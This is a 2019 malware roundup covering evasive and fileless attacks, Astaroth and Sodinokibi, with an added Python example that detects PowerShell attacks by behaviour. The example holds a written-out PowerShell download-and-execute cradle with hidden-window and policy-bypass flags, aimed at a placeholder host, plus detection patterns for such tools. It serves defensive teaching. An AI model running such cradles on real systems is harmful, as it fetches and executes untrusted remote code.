2019 has been a year of malware attacks: ransomware hold-ups, supply-chain compromises and fileless attacks against individuals, businesses and government agencies. Many of them succeeded because the security controls in place were not built for the techniques the newer malware uses. With malware this prevalent and widespread, here is a look back at the most notable malware seen in July and August 2019. Malware activity rose sharply in those two months, and much of it was built specifically to bypass security controls: changing file hashes through obfuscation so that signature-based antivirus no longer recognises the sample, encrypting command-and-control (C2) traffic to blind EDR tools, and detecting AI and machine-learning engines and sandboxes, then deliberately delaying execution so that the analysis environment sees nothing malicious.
Image source: thehackernews.com
The other direction in which malware has evolved is fileless attacks and "living off the land". Instead of dropping a binary to disk, the attack runs PowerShell commands and other built-in system tools entirely from memory (RAM). Such attacks slip past traditional IOC-based solutions, and detecting them requires behavioural analysis of what a process does rather than matching known file hashes. One of the more serious and sinister malware families this summer is Astaroth, which, according to Cymulate Research Lab, who tested the malware's potency, has targeted European and Brazilian organisations. Astaroth is deceptive enough to evade traditional IOC-based security controls, and once inside it steals PII, financial data and user credentials.
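The two points above, that hash-based IOCs fail once a sample is re-obfuscated and that fileless PowerShell activity has to be caught by what it does, are illustrated by the following added example. It is not code from the original article or from any of the vendors it cites. It constructs three sample process-creation events (two variants of the same PowerShell download cradle launched from Office, plus one benign command), decodes the -EncodedCommand payload as PowerShell would (UTF-16LE Base64), and scores each event against a small set of behavioural rules; the event fields, rule names and the example.invalid URL are assumptions made for the demonstration.

```python
import base64
import hashlib
import re

# --- Constructed sample telemetry (not real logs) ---------------------------

def encode_ps(script: str) -> str:
    """Produce the Base64 form PowerShell expects for -EncodedCommand (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Same download cradle twice: variant B only differs in case and whitespace,
# which is enough to change every file/command-line hash but not the behaviour.
CRADLE_A = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
CRADLE_B = "iex  ( new-object   net.webclient ).downloadstring( 'http://example.invalid/p.ps1' )"

SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "winword.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc " + encode_ps(CRADLE_A)},
    {"pid": 4188, "parent": "excel.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
                + encode_ps(CRADLE_B)},
    {"pid": 5000, "parent": "explorer.exe",
     "cmdline": "powershell.exe -Command Get-ChildItem C:\\Users"},
]

# --- Behavioural detection ---------------------------------------------------

# PowerShell accepts abbreviated switches, so match the long and short forms.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

BEHAVIOUR_RULES = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)),
    ("execution_policy_bypass", re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.IGNORECASE)),
    ("encoded_command", ENCODED_FLAG),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient",
                                   re.IGNORECASE)),
    ("in_memory_exec", re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ALERT_THRESHOLD = 3  # assumed: three or more behaviours together is worth an alert


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event: dict) -> dict:
    """Score one process-creation event on behaviour, not on a known hash."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    # Rules run over the visible command line and, when present, the decoded payload,
    # so an encoded cradle cannot hide the download/IEX behaviour.
    text = cmdline + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in BEHAVIOUR_RULES if rx.search(text)]
    if event["parent"].lower() in OFFICE_PARENTS:
        hits.append("office_parent")
    return {
        "pid": event["pid"],
        "sha256": hashlib.sha256(cmdline.encode("utf-8")).hexdigest(),
        "decoded": decoded,
        "hits": hits,
        "suspicious": len(hits) >= ALERT_THRESHOLD,
    }


def hash_ioc_matches(event: dict, known_hashes: set) -> bool:
    """The traditional IOC check: only fires on a command line seen before, byte for byte."""
    return hashlib.sha256(event["cmdline"].encode("utf-8")).hexdigest() in known_hashes


if __name__ == "__main__":
    # Pretend variant A was seen once and its hash published as an IOC.
    known = {analyse_event(SAMPLE_EVENTS[0])["sha256"]}
    for ev in SAMPLE_EVENTS:
        r = analyse_event(ev)
        print(f"pid={r['pid']} hash_ioc={hash_ioc_matches(ev, known)} "
              f"behaviour={r['suspicious']} hits={r['hits']}")
```

Run as a script, the hash IOC matches only the first event, while the behavioural rules flag both cradle variants and leave the benign directory listing alone. Real deployments would feed Sysmon Event ID 1 or PowerShell script-block logs (Event ID 4104) into the same logic rather than the constructed events used here.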
Sodinokibi ransomware exploits CVE-2018-8453, a Windows win32k privilege-escalation vulnerability that Microsoft patched in October 2018. Exploitation of a vulnerability like this by ransomware is rare; on an unpatched host it lets the malware gain admin-level access.
Source: The Hacker News
Disclaimer: Darkweblink.com does not promote or endorse claims made by any parties in this article. The information provided here is for general purposes only and is not intended to promote or support the purchase or sale of any products or services, or to serve as a recommendation to do so. Neither Darkweblink.com nor any of its members is responsible, directly or indirectly, for any loss or damage caused or alleged to be caused by or in connection with reliance on or use of any content, goods or services mentioned in this article.